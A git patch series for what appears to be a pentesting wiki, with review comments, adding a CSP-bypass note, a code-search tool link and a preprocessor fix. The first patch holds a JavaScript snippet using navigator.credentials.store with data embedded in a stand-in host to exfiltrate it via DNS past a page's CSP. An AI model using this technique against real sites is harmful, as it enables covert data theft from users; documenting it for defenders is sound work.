From b8d5b73ea48706f19f977c0966c64c76d71c95a5 Mon Sep 17 00:00:00 2001 From: Satoki Date: Sun, 19 Jan 2025 07:44:44 +0900 Subject: [PATCH 1/3] Add CSP Exfiltration Bypass Technic by CredentialsContainer --- .../content-security-policy-csp-bypass/README.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md index c017f6de1..a7d78784c 100644 --- a/src/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md @@ -794,6 +794,22 @@ var pc = new RTCPeerConnection({ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp); ``` +### CredentialsContainer + +The credential popup sends a DNS request to the iconURL without being restricted by the page. It only works in a secure context (HTTPS) or on localhost. + +```javascript +navigator.credentials.store( + new FederatedCredential({ + id:"satoki", + name:"satoki", + provider:"https:"+your_data+"example.com", + iconURL:"https:"+your_data+"example.com" + }) + ) +``` + + ## Checking CSP Policies Online - [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com) From 0b49e8d757118bea79148ae2a196abd4aabd1246 Mon Sep 17 00:00:00 2001 From: Michael Sukkarieh Date: Wed, 22 Jan 2025 08:59:06 -0800 Subject: [PATCH 2/3] Update wide-source-code-search.md --- .../external-recon-methodology/wide-source-code-search.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index a9613ace3..023b7b243 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md 
@@ -6,7 +6,8 @@ The goal of this page is to enumerate **platforms that allow to search for code* This helps in several occasions to **search for leaked information** or for **vulnerabilities** patterns. -- [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes. +- [**Sourcebot**](https://www.sourcebot.dev/): Open source code search tool. Index and search across thousands of your repos through a modern web interface. +- [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes. - [**Github Search**](https://github.com/search): Search across Github. It supports regexes. - Maybe it's also useful to check also [**Github Code Search**](https://cs.github.com/). - [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced_search.html): Search across Gitlab projects. Support regexes. From 5ea057ea11eea50753fe14920a74bcd1027017e4 Mon Sep 17 00:00:00 2001 From: Congon4tor Date: Sun, 26 Jan 2025 17:59:14 +0100 Subject: [PATCH 3/3] update preprocessor --- hacktricks-preprocessor.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py index af5949449..5d070c39f 100644 --- a/hacktricks-preprocessor.py +++ b/hacktricks-preprocessor.py @@ -78,6 +78,9 @@ def ref(matchobj): sys.exit(1) + if href.endswith("/README.md"): + href = href.replace("/README.md", "/index.html") + template = f"""{title}""" # translate_table = str.maketrans({"\"":"\\\"","\n":"\\n"})
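Review bot: the URL concatenation in the CredentialsContainer hunk is malformed: `provider:"https:"+your_data+"example.com"` and the matching `iconURL` line produce `https:<data>example.com`, with no `//` after the scheme and no dot before the domain, so no hostname carrying the data is ever built; `"https://"+your_data+".example.com"` (with `your_data` limited to label-safe characters) is what the sentence above the block describes, and `your_data` itself is used without being introduced, so the text should say what it stands for. The prose also needs one more sentence making the mechanism explicit: "without being restricted by the page" means the request is issued by the browser's credential UI, outside the document's CSP, which is the point a defender needs, since it means CSP directives such as `img-src` or `connect-src` are not a control for this channel and the secure-context requirement noted in the text is the only precondition. Minor: the hunk leaves two blank lines before `## Checking CSP Policies Online` where the file uses one.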
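Review bot: the new Sourcebot bullet describes a different kind of tool from its neighbours and should say so: "search across thousands of your repos" means it indexes repositories you configure, whereas the surrounding entries (SourceGraph, Github Search, Gitlab Advanced Search) search code you do not own, which is what the page's stated goal of finding "leaked information" relies on. State that it is self-hosted over your own repositories, record whether it supports regexes (every other entry does), and drop "modern web interface", which is marketing rather than information. Also, the SourceGraph line appears as both `-` and `+` with identical text, which points to a trailing-whitespace or line-ending change; reverting it keeps the diff to the one intended addition.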
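Review bot: the rewrite in the preprocessor hunk uses `str.replace`, which substitutes every occurrence rather than only the suffix the preceding `endswith` check verified; `href = href[:-len("/README.md")] + "/index.html"` (or `removesuffix` on Python 3.9+) expresses the intent exactly. The check also misses hrefs that carry a fragment or query after the filename, such as `.../README.md#section`, which pass through unchanged and will point at a file that no longer exists under that name; split off the fragment before the suffix test and reattach it afterwards. A one-line comment stating why README.md links must be rewritten to index.html would help the next reader, and the hunk leaves two blank lines before `template = f"""{title}"""` where one would do.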